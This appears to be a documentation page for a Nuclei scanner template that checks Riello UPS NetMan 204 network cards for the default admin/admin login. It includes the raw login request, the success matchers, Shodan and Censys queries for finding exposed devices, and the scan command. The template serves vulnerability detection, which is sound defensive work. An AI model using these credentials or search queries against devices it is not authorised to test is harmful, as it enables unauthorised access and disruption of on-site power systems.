Skip to content

Riello UPS NetMan 204 Network Card - Default Login

ID: netman-default-login

Severity: high

Author: mabdullah22

Tags: default-login,netman

Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.

id: netman-default-login
info:
name: Riello UPS NetMan 204 Network Card - Default Login
author: mabdullah22
severity: high
description: |
Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
reference:
- https://www.riello-ups.com/
classification:
cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: riello-ups
product: netman_204_firmware
shodan-query: title:"Netman"
censys-query: services.http.response.body:"Netman204"
tags: default-login,netman
http:
- raw:
- |
GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response": "ok",'
- '"message": "Welcome."'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100df0b9fdc4e80f7d1773ae5b422cebfe53950bb1da5e56be36158b29419933d8702201a10d5f175514b2f06781a79b5ca5d8e24f263b9d4f12b035aa196a75330bde7:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/riello/netman-default-login.yaml"

View on Github